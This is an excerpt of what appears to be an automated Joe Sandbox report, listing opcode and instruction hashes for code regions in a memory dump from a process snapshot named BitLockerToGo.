                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: efe868ee5ba58c5bef0459794eba2dbd496e49c224836a1f8003f6dd08ea4d3a
                • Instruction ID: 489eee55b43af34d753f1a3bc2198b35fe10394c8af40d33cb73487fc6ffdd1c
                • Opcode Fuzzy Hash: efe868ee5ba58c5bef0459794eba2dbd496e49c224836a1f8003f6dd08ea4d3a
                • Instruction Fuzzy Hash: 554117B2A182604FE3488E39D59037ABBD2DFC9350F05867DF1E9873D1C6788845EB11
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b41b96781d23829e2df609b6ce1633b3bf422ab2bb4ed606be739754ddd4995d
                • Instruction ID: a25cdb1854995a45bc617a4837d22dd9654c7102f2bccb8378ec939a06858b5e
                • Opcode Fuzzy Hash: b41b96781d23829e2df609b6ce1633b3bf422ab2bb4ed606be739754ddd4995d
                • Instruction Fuzzy Hash: 6D41A9A646DBC25FCB43C7388CFA680BF70AD1320534E61DFC0818F497D619A829E756
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 905e6ff41130ed2f69832d99538fbac8ad211432f811d5c02125e523ae7de41b
                • Instruction ID: 06136ab4ce5d419df85cc6da42f892cd0344d93c32645877c60b34649ae900eb
                • Opcode Fuzzy Hash: 905e6ff41130ed2f69832d99538fbac8ad211432f811d5c02125e523ae7de41b
                • Instruction Fuzzy Hash: 1A117C30614B018FD728CF15C8D4A37B7E2BB89312F94991CD4DB07A65E730E885CB58
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a446bb6d51ed20c487d07830c3fc52519b522961cbdca932543cfbef497af478
                • Instruction ID: f86f23ea02d0797c9cdea6271e4f403ff42a0f3f5fb0bf157ad0d53791ae0b6e
                • Opcode Fuzzy Hash: a446bb6d51ed20c487d07830c3fc52519b522961cbdca932543cfbef497af478
                • Instruction Fuzzy Hash: D931E3711687419BD318DF14C8A4A6FB3E2FFC5308F548A1DE58A132A1CB70AD96CF82
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                • Instruction ID: 7789e973b11ddd731561f600723d51bde43e4826aeefb262e085635853d896f4
                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                • Instruction Fuzzy Hash: 77110C33A251D54EC3168D3C8450667BFA30AA3239F5D8399F4F59B2D2D6238DCBA354
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4c49112d934dcffccd5e1c29842df051fe1fc1f71b2fbc50dc5ac815b336ea4f
                • Instruction ID: 7258d20d370e6029e275e1b1f7115733242c1c1cc471895f2bed79ee9eb896fa
                • Opcode Fuzzy Hash: 4c49112d934dcffccd5e1c29842df051fe1fc1f71b2fbc50dc5ac815b336ea4f
                • Instruction Fuzzy Hash: EC01B5F1620B5387DB209E14D4E077BF2A9AF44729F08002CEC099B201DB79FC2986D9
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3c42958cf081c73a235c3fdb2ae9f6623085816a4b10f424cfb641ab42021d86
                • Instruction ID: 12e4c9696e99212f53c9626bd2aeedce5cf63f9bba42b6d5db47e53f3689d8dd
                • Opcode Fuzzy Hash: 3c42958cf081c73a235c3fdb2ae9f6623085816a4b10f424cfb641ab42021d86
                • Instruction Fuzzy Hash: A1F02E777352161BA320CD6AECC0937F356D7CD654F1A503DE581D3601C571EE129390
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 60e3998aa491883378bed81065d5de250d8eddc4a97dd8f0c60c9f1a266c8c84
                • Instruction ID: 539a0eeffdac98e8dfc297ab1708a8d43ab128ac0859ecbd2f289cb064f43d58
                • Opcode Fuzzy Hash: 60e3998aa491883378bed81065d5de250d8eddc4a97dd8f0c60c9f1a266c8c84
                • Instruction Fuzzy Hash: C0E0DF742053824FD7594F22E868B233BB09B47210F06D42DD443C7691C674D840CB14
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                • Instruction ID: 42e71289043893d4359e32e950a8f69caec7ff62920eec2ef020d8a8eea0d04f
                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                • Instruction Fuzzy Hash: 27D0A7B15487B20E5B588D3804A0977FBECE987652F18149EF8D1E3145D220DC16869D
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 152f3d6da3e5575bbc73eb3aa325bd4325eff911f681030466b80362a5b34b9e
                • Instruction ID: d0bc14a84512e6653e09f8dde52d1498a50c1e468d528054ec252232bf9ed5d8
                • Opcode Fuzzy Hash: 152f3d6da3e5575bbc73eb3aa325bd4325eff911f681030466b80362a5b34b9e
                • Instruction Fuzzy Hash: DDB092E5C126918A91212A103C134EBF0260A1325EF082030F80A66212AA26D26B499F